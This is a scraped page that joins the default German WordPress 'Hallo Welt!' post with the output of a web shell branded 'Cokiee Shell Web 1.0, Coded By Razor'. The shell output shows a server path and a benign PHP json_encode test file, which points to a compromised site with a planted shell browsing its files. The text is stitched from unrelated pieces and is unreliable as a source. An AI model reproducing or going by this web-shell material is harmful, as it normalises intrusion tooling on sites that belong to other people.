Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/json/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/json/tests/bug43941.phpt |
--TEST-- Bug #43941 (json_encode() invalid UTF-8) --SKIPIF-- <?php if (!extension_loaded("json")) print "skip"; ?> --FILE-- <?php var_dump(json_encode("abc")); var_dump(json_encode("ab\xE0")); var_dump(json_encode("ab\xE0", JSON_PARTIAL_OUTPUT_ON_ERROR)); var_dump(json_encode(array("ab\xE0", "ab\xE0c", "abc"), JSON_PARTIAL_OUTPUT_ON_ERROR)); echo "Done\n"; ?> --EXPECTF-- string(5) ""abc"" bool(false) string(4) "null" string(17) "[null,null,"abc"]" Done
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare